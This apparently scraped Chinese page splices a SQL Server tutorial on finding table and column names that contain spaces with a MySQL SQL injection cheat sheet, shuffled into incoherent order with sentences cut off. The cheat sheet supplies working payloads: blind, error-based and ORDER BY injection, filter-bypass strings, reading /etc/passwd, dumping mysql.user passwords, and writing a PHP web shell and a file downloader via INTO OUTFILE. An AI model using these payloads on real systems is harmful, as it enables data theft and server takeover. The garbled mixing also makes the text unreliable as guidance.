图片 3

SQL Server如何查找表名或列名中包含空格的表和列

 

绕过字符串黑名单

SELECT ‘a’ ‘d’ ‘mi’ ‘n’;
SELECT CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
SELECT CONCAT_WS(”, ‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
SELECT GROUP_CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);

使用CONCAT()时,任何个参数为null,将返回null,
推荐使用CONCAT_WS() 。

CONCAT_WS()
函数第一个参数表示用哪个字符间隔所查询的结果。

DECLARE @db_name  NVARCHAR(32);

DECLARE @sql_text NVARCHAR(MAX);

 

DECLARE @db TABLE 

(

    database_name  NVARCHAR(64)

);

 

 

 

INSERT INTO @db

SELECT name FROM sys.databases WHERE state_desc='ONLINE' AND database_id !=2;

 

 

WHILE (1=1)

BEGIN

    SELECT TOP 1 @db_name = database_name FROM @db ORDER BY 1;

    

    IF @@ROWCOUNT = 0 RETURN;

 

    SET @sql_text =N'USE ' + @db_name +';

 

                                    

                    SELECT ''' + @db_name  + '''  as database_name, name, 

                         DATALENGTH(name) as table_name_bytes,

                         LEN(name)          as table_name_character,

                         type_desc,create_date,modify_date 

                    FROM sys.tables

                    WHERE   DATALENGTH(name) != LEN(name) * 2;

                   ';

        PRINT(@sql_text);

 

        EXECUTE(@sql_text);

 

        DELETE FROM @db WHERE database_name=@db_name;

 

END

 

表和字段

 

order by后的注入

oder
by由于是排序语句,所以可以利用条件语句做判断,根据返回的排序结果不同判断条件的真假。

一般带有oder或者orderby的变量很可能是这种注入,在知道一个字段的时候可以采用如下方式注入:

原始链接:http://www.test.com/list.php?order=vote
根据vote字段排序。

找到投票数最大的票数num然后构造以下链接:

http://www.test.com/list.php?order=abs(vote-(length(user())>0)*num)+asc

看排序是否变化。

还有一种方法不需要知道任何字段信息,使用rand函数:

http://www.test.com/list.php?order=rand(true)
http://www.test.com/list.php?order=rand(false)

以上两个会返回不同的排序,判断表名中第一个字符是否小于128的语句如下:

http://www.test.com/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))

最近发现一个数据库中的某个表有个字段名后面包含了一个空格,这个空格引起了一些小问题,一般出现这种情况,是因为创建对象时,使用双引号或双括号的时候,由于粗心或手误多了一个空格,如下简单案例所示:

查询列名

Union方式 UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = ‘tablename’
盲注 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > ‘A’
报错 AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));– 在5.1.5版本中成功。 AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)– MySQL 5.1版本修复了
利用PROCEDURE ANALYSE() 这个需要web展示页面有你所注入查询的一个字段。 例子: 查询语句 SELECT username, permission FROM Users WHERE id = 1; 1 PROCEDURE ANALYSE() 获得第一个段名 1 LIMIT 1,1 PROCEDURE ANALYSE() 获得第二个段名 1 LIMIT 2,1 PROCEDURE ANALYSE() 获得第三个段名

 

测试数据库版本

VERSION()
@@VERSION
@@GLOBAL.VERSION

如果版本为5的话,下面例子返回为真:

SELECT * FROM Users WHERE id = '1' AND MID(VERSION(),1,1) = '5';

windows平台上的mysql查询与linux上返回不同,如果是windows服务器返回结果会包含
-nt-log字符。

 

默认存在的数据库:

mysql 需要root权限读取
information_schema 在5以上的版本中存在

 

条件语句

CASE
IF()
IFNULL()
NULLIF()

例子:

SELECT IF(1=1, true, false);
SELECT CASE WHEN 1=1 THEN true ELSE false END;

 

PDO堆查询方式操作数据库

PHP使用PDO_MYSQL来连接数据库,便可以使用堆查询,堆查询可以同时执行多个语句。

SELECT * FROM Users WHERE ID=1 AND 1=0; INSERT INTO Users(username,password,priv) VALUES ('BobbyTables', 'kl20da$$','admin');

 

基于关键字的黑名单

过滤关键字 and or
php代码 preg_match(‘/(and|or)/i’,$id)
会过滤的攻击代码 1 or 1=1 1 and 1=1
绕过方式 1 || 1=1 1 && 1=1

下面这种方式你需要已经知道一些表和字段名(可以利用substring函数去一个一个获得information_schema.columns表中的数据)

过滤关键字 and or union
php代码 preg_match(‘/(and|or|union)/i’,$id)
会过滤的攻击代码 union select user,password from users
绕过方式 1 && (select user from users where userid=1)=’admin’
过滤关键字 and or union where
php代码 preg_match(‘/(and|or|union|where)/i’,$id)
会过滤的攻击代码 1 && (select user from users where user_id = 1) = ‘admin’
绕过方式 1 && (select user from users limit 1) = ‘admin’
过滤关键字 and or union where
php代码 preg_match(‘/(and|or|union|where)/i’,$id)
会过滤的攻击代码 1 && (select user from users where user_id = 1) = ‘admin’
绕过方式 1 && (select user from users limit 1) = ‘admin’
过滤关键字 and, or, union, where, limit
php代码 preg_match(‘/(and|or|union|where|limit)/i’, $id)
会过滤的攻击代码 1 && (select user from users limit 1) = ‘admin’
绕过方式 1 && (select user from users group by user_id having user_id = 1) = ‘admin’#user_id聚合中user_id为1的user为admin
过滤关键字 and, or, union, where, limit, group by
php代码 preg_match(‘/(and|or|union|where|limit|group by)/i’, $id)
会过滤的攻击代码 1 && (select user from users group by user_id having user_id = 1) = ‘admin’
绕过方式 1 && (select substr(group_concat(user_id),1,1) user from users ) = 1
过滤关键字 and, or, union, where, limit, group by, select
php代码 preg_match(‘/(and|or|union|where|limit|group by|select)/i’, $id)
会过滤的攻击代码 1 && (select substr(gruop_concat(user_id),1,1) user from users) = 1
绕过方式 1 && substr(user,1,1) = ‘a’
过滤关键字 and, or, union, where, limit, group by, select, ‘
php代码 preg_match(‘/(and|or|union|where|limit|group by|select|\’)/i’, $id)
会过滤的攻击代码 1 && (select substr(gruop_concat(user_id),1,1) user from users) = 1
绕过方式 1 && user_id is not null 1 && substr(user,1,1) = 0x61 1 && substr(user,1,1) = unhex(61)
过滤关键字 and, or, union, where, limit, group by, select, ‘, hex
php代码 preg_match(‘/(and|or|union|where|limit|group by|select|\’|hex)/i’, $id)
会过滤的攻击代码 1 && substr(user,1,1) = unhex(61)
绕过方式 1 && substr(user,1,1) = lower(conv(11,10,16)) #十进制的11转化为十六进制,并小写。
过滤关键字 and, or, union, where, limit, group by, select, ‘, hex, substr
php代码 preg_match(‘/(and|or|union|where|limit|group by|select|\’|hex|substr)/i’, $id)
会过滤的攻击代码 1 && substr(user,1,1) = lower(conv(11,10,16))/td>
绕过方式 1 && lpad(user,7,1)
过滤关键字 and, or, union, where, limit, group by, select, ‘, hex, substr, 空格
php代码 preg_match(‘/(and|or|union|where|limit|group by|select|\’|hex|substr|\s)/i’, $id)
会过滤的攻击代码 1 && lpad(user,7,1)/td>
绕过方式 1%0b||%0blpad(user,7,1)
过滤关键字 and or union where
php代码 preg_match(‘/(and|or|union|where)/i’,$id)
会过滤的攻击代码 1 || (select user from users where user_id = 1) = ‘admin’
绕过方式 1 || (select user from users limit 1) = ‘admin’

 

数据库名:

information_schema.schemata, mysql.db
字段 schema_name, db
当前数据库 database(), schema()

例子:

SELECT database();
SELECT schema_name FROM information_schema.schemata;
SELECT DISTINCT(db) FROM mysql.db;-- (Privileged)

 

一次查询多个表或列

SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema&gt;=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] &gt;',table_name,' &gt; ',column_name))))x

例子:

SELECT * FROM Users WHERE id = '-1' UNION SELECT 1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema&gt;=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] &gt;',table_name,' &gt; ',column_name))))x), 4--+';

输出结果:

 [ information_schema ] >CHARACTER_SETS > CHARACTER_SET_NAME
 [ information_schema ] >CHARACTER_SETS > DEFAULT_COLLATE_NAME
 [ information_schema ] >CHARACTER_SETS > DESCRIPTION
 [ information_schema ] >CHARACTER_SETS > MAXLEN
 [ information_schema ] >COLLATIONS > COLLATION_NAME
 [ information_schema ] >COLLATIONS > CHARACTER_SET_NAME
 [ information_schema ] >COLLATIONS > ID
 [ information_schema ] >COLLATIONS > IS_DEFAULT
 [ information_schema ] >COLLATIONS > IS_COMPILED

利用代码:

SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns

例子:

SELECT username FROM Users WHERE id = '-1' UNION SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns;

输出结果:

Table: talk_revisions
Column: revid

Table: talk_revisions
Column: userid

Table: talk_revisions
Column: user

Table: talk_projects
Column: priority

不包含尾随空格。所以这个脚本是无法排查表名或字段名前面包含空格的。如果要排查这种情况,就需要使用下面SQL脚本(中间包含空格在此略过,这个不符合命名规则):

检测字段数

两种方式:

ORDER BY判断 ORDER BY n+1; 让n一直增加直到出现错误页面。 例子: 查询语句 SELECT username, password, permission FROM Users WHERE id = ‘1’; 1′ ORDER BY 1–+ 真 1′ ORDER BY 2–+ 真 1′ ORDER BY 3–+ 真 1′ ORDER BY 4–+ 假- 查询只用了3个字段 -1′ UNION SELECT 1,2,3–+ 真
基于错误查询 AND (SELECT * FROM SOME_EXISTING_TABLE) = 1 注意: 这种方式需要你知道所要查询的表名。 这种报错方式返回表的字段数,而不是错误的查询语句。 例子: 查询语句 SELECT permission FROM Users WHERE id = 1; AND (SELECT * FROM Users) = 1 返回Users的字段数

 

测试是否存在注入方法

假:表示查询是错误的
(MySQL 报错/返回页面与原来不同)

真:表示查询是正常的
(返回页面与原来相同)

共三种情况:

字符串类型查询时: 数字类型查询时: 登陆时:
"
""
\
\\
AND 1
AND 0
AND true
AND false
1-false 有问题时返回1的结果
1-true 有问题时返回0的结果
2-1 返回与1相同代表可能存在问题
1*56 返回与56相同代表可能存在问题
1*56 返回与1相同代表没有问题
‘ OR ‘1
‘ OR 1 — –
" OR "" = "
" OR 1 = 1 — –
‘=’
‘LIKE’
‘=0–+

例子:

SELECT * FROM Users WHERE id = '1''';
SELECT * FROM Users WHERE id = 3-2;
SELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = '';

可以使用很多单双引号,只要是成对出现。

SELECT * FROM Articles WHERE id = '121'''''''''''''

引号后的语句会继续执行。

SELECT '1'''''"" UNION SELECT '2' # 1 and 2

下面的符号可以用来注释语句:

# Hash 语法
/* C-style 语法
— – SQL 语法
;%00 空字节
` 反引号

例子:

SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password = '';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';

 

权限

原理是这样的,保存这些元数据的字段类型为sysname **,其实这个系统数据类型,用于定义表列、变量以及存储过程的参数,是nvarchar(128)的同义词。所以一个字母占2个字节。**那么我们安装这个规律写了一个脚本来检查数据中那些表名或字段名包含空格。方便巡检。如下测试所示

读取文件

如果用户有文件操作权限可以读取文件:

LOAD_FILE()

例子:

SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE(0x2F6574632F706173737764);
  • 文件必须在服务器上。
  • LOAD_FILE()函数操作文件的当前目录是@@datadir
  • MySQL用户必须拥有对此文件读取的权限。
  • 文件大小必须小于
    max_allowed_packet。
  • @@max_allowed_packet的默认大小是1047552
    字节.

图片 1

时间延迟查询:

SLEEP() MySQL 5
BENCHMARK() MySQL 4/5

例子:

' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '

 

利用正则表达式进行盲注

我们都已经知道,在MYSQL
5+中 information_schema库中存储了所有的
库名,表明以及字段名信息。故攻击方式如下:

1、判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli是假设已知的库名。

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*

2、判断第一个字符是否是a-n中的字符

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables  WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*

3、确定该字符为n

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables  WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1) /*

4、表达式的更换如下

'^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE 

这时说明表名为news
,要验证是否是该表明 正则表达式为’^news$’,但是没这必要 直接判断
table_name = ‘news’ 不就行了。

5、接下来猜解其它表了
只需要修改 limit 1,1 -> limit
2,1就可以对接下来的表进行盲注了。

 

模糊和混淆

SELECT
* FROM sys.columns WHERE NAME LIKE ‘ %’ 
–字段前面包含空格。

写文件

如果用户有文件操作权限可以写文件。

INTO OUTFILE/DUMPFILE

写一个php的shell:

SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';

访问如下链接:

http://localhost/shell.php?c=cat%20/etc/passwd

写一个下载者:

SELECT '<? fwrite(fopen($_GET[f], \'w\'), file_get_contents($_GET[u])); ?>' INTO OUTFILE '/var/www/get.php'

访问如下链接:

http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt

  • INTO
    OUTFILE 不可以覆盖已存在的文件。
  • INTO
    OUTFILE 必须是最后一个查询。
  • 引号是必须的,因为没有办法可以编码路径名。
SELECT  name ,

        DATALENGTH(name) AS NAME_BYTES ,

        LEN(name)         AS NAME_CHARACTER

FROM    sys.columns

WHERE   object_id = OBJECT_ID('TEST_COLUMN');

宽字节注入

sql注入中的宽字节国内最常使用的gbk编码,这种方式主要是绕过addslashes等对特殊字符进行转移的绕过。反斜杠()的十六进制为%5c,在你输入%bf%27时,函数遇到单引号自动转移加入\,此时变为%bf%5c%27,%bf%5c在gbk中变为一个宽字符“縗”。%bf那个位置可以是%81-%fe中间的任何字符。不止在sql注入中,宽字符注入在很多地方都可以应用。

USE TEST;

GO

 

--表TEST_COLUMN中两个字段都包含有空格

CREATE TABLE TEST_COLUMN 

(

    "ID  "    INT IDENTITY (1,1),

    [Name ]   VARCHAR(32),

    [Normal]  VARCHAR(32)

);

GO

 

--表[TEST_TABLE ]中包含空格, 里面对应三个字段,一个前面包含空格(后面详细阐述),一个字段中间包含空格,一个字段后面包含空格。

CREATE TABLE [TEST_TABLE ]

(

 

    [ F_NAME]        NVARCHAR(32),

    [M NAME]         NVARCHAR(32),

    [L_NAME ]        NVARCHAR(32)

)

GO

根据列名查询所在的表

SELECT table_name FROM information_schema.columns WHERE column_name = ‘username’; 查询字段为username的表
SELECT table_name FROM information_schema.columns WHERE column_name LIKE ‘%user%’; 查询字段中包含user的表

 

绕过引号限制

SELECT * FROM Users WHERE username = 0x61646D696E Hex编码
SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110) 利用CHAR()函数

 

AND或OR后面可以跟的字符

20 Space
2B +
2D
7E ~
21 !
40 @

例子:

SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))

dual是一个虚拟表,可以用来做测试。

 

文件权限

下面的语句可以查询用户读写文件操作权限:

SELECT file_priv FROM mysql.user WHERE user = ‘username’; 需要root用户来执行 MySQL 4/5
SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%’; 普通用户都可以 MySQL 5

 

MySql特有的写法

MySql中,/*! SQL
语句 */ 这种格式里面的 SQL 语句会当正常的语句一样被解析。

如果在!之后是一串数字(这串数字就是
mysql 数据库的版本号), 如:/*! 12345 SQL 语句 */

当版本号大于等于该数字,SQL
语句则执行,否则就不执行。

SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);

 

服务器主机名:

@@HOSTNAME

例子:

SELECT @@hostname;

另外,对应表名而言,可以使用下面脚本。在此略过,不做过多介绍!

几个针对黑名单绕过的例子

 

查询表名

三种方式:

Union方式 UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;– MySQL 4版本时用version=9,MySQL 5版本时用version=10
盲注 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > ‘A’
报错 AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));– 在5.1.5版本中成功。

 

允许的字符

09 Horizontal Tab
0A New Line
0B Vertical Tab
0C New Page
0D Carriage Return
A0 Non-breaking Space
20 Space

例子:

'%0A%09UNION%0CSELECT%A0NULL%20%23

括号也可以用来绕过过滤空格的情况:

28 (
29 )

例子:

UNION(SELECT(column)FROM(table))

那么为什么表名TEST_TABLE的三个字段里面,前面包含空格与与中间包含空格都识别不出来呢?这个与数据库的LEN函数有关系,LEN函数返回指定字符串表达式的字符数,其中

数据库认证信息:

mysql.user
字段 user, password
当前用户 user(), current_user(), current_user, system_user(), session_user()

例子:

SELECT current_user;
SELECT CONCAT_WS(0x3A, user, password) FROM mysql.user WHERE user = 'root'-- (Privileged)
 

IF OBJECT_ID('tempdb.dbo.#TabColums') IS NOT NULL

    DROP TABLE dbo.#TabColums;

 

CREATE TABLE #TabColums

(

    object_id            INT ,

    column_id            INT

)

 

INSERT INTO #TabColums

SELECT  object_id ,

        column_id

FROM    sys.columns

WHERE   DATALENGTH(name) != LEN(name) * 2

 

 

SELECT 

    TL.name AS TableName,

    C.Name AS FieldName,

    T.Name AS DataType,

    DATALENGTH(C.name) AS COLUMN_DATALENGTH,

    LEN(C.name) AS COLUMN_LENGTH,

    CASE WHEN C.Max_Length = -1 THEN 'Max' ELSE CAST(C.Max_Length AS VARCHAR) END AS Max_Length,

    CASE WHEN C.is_nullable = 0 THEN '×'  ELSE N'√' END AS Is_Nullable,

    C.is_identity,

    ISNULL(M.text, '')  AS  DefaultValue,

    ISNULL(P.value, '') AS FieldComment

    

FROM sys.columns  C

INNER JOIN  sys.types T ON C.system_type_id = T.user_type_id

LEFT  JOIN dbo.syscomments M ON M.id = C.default_object_id

LEFT  JOIN sys.extended_properties P ON P.major_id = C.object_id AND C.column_id = P.minor_id 

INNER JOIN sys.tables TL ON TL.object_id = C.object_id

INNER JOIN #TabColums TC ON C.object_id = TC.object_id AND c.column_id = TC.column_id

ORDER BY C.Column_Id ASC

根据表查询包含的字段

SELECT column_name FROM information_schema.columns WHERE table_name = ‘Users’; 查询user表中的字段
SELECT column_name FROM information_schema.columns WHERE table_name LIKE ‘%user%’; 查询包含user字符串表中的字段

 

 

 

 

 

 

    DATALENGTH(name) = 2* LEN(name)

图片 2

图片 3

 

 

 

其实到了这一步,还没有完,如果一个实例,里面有十几个数据库,那么使用上面这个脚本,我要切换数据库,执行十几次,对于我这种懒人来说,我觉得无法忍受的。那么必须写

 

一个脚本,将所有数据库全部检查完。本来想用sys.sp_MSforeachdb,但是这个内部存储过程有一些限制,遂写了下面脚本。

 

 

 

那么要如何找出表名或字段名包含空格的相关信息呢?
不管是常规方法还是正则表达式,这个都会效率不高。我们可以用一个取巧的方法,就是通过字段的字符数和字节数的规律来判断,如果没有包含空格,那么列名的字节数和字符数满足下面规律(表名也是如此):

DECLARE @db_name  NVARCHAR(32);

DECLARE @sql_text NVARCHAR(MAX);

 

DECLARE @db TABLE 

(

    database_name  NVARCHAR(64)

);

 

IF OBJECT_ID('tempdb.dbo.#TabColums') IS NOT NULL

 

    DROP TABLE dbo.#TabColums;

 

CREATE TABLE #TabColums

(

    object_id            INT ,

    column_id            INT

);

 

 

INSERT INTO @db

SELECT name FROM sys.databases WHERE state_desc='ONLINE' AND database_id !=2;

 

 

WHILE (1=1)

BEGIN

    SELECT TOP 1 @db_name = database_name FROM @db ORDER BY 1;

    

    IF @@ROWCOUNT = 0 RETURN;

 

    SET @sql_text =N'USE ' + @db_name +';

                     TRUNCATE TABLE #TabColums;

 

    

                    INSERT INTO #TabColums

                    SELECT  object_id ,

                            column_id

                    FROM    sys.columns

                    WHERE   DATALENGTH(name) != LEN(name) * 2;

                

                    SELECT  ''' + @db_name  + ''' AS DatabaseName,

                            TL.name AS TableName ,

                            C.name AS FieldName ,

                            T.name AS DataType ,

                            DATALENGTH(C.name) AS COLUMN_DATALENGTH ,

                            LEN(C.name) AS COLUMN_LENGTH ,

                            CASE WHEN C.max_length = -1 THEN ''Max''

                                    ELSE CAST(C.max_length AS VARCHAR)

                            END AS Max_Length ,

                            CASE WHEN C.is_nullable = 0 THEN ''×''

                                    ELSE ''√''

                            END AS Is_Nullable ,

                            C.is_identity ,

                            ISNULL(M.text, '''') AS DefaultValue ,

                            ISNULL(P.value, '''') AS FieldComment

                    FROM    sys.columns C

                            INNER JOIN sys.types T ON C.system_type_id = T.user_type_id

                            LEFT  JOIN dbo.syscomments M ON M.id = C.default_object_id

                            LEFT  JOIN sys.extended_properties P ON P.major_id = C.object_id

                                                                    AND C.column_id = P.minor_id

                            INNER JOIN sys.tables TL ON TL.object_id = C.object_id

                            INNER JOIN #TabColums TC ON C.object_id = TC.object_id

                                                        AND C.column_id = TC.column_id

                    ORDER BY C.column_id ASC;';

        PRINT(@sql_text);

 

        EXECUTE(@sql_text);

 

        DELETE FROM @db WHERE database_name=@db_name;

 

END

 

TRUNCATE TABLE #TabColums;

DROP TABLE #TabColums;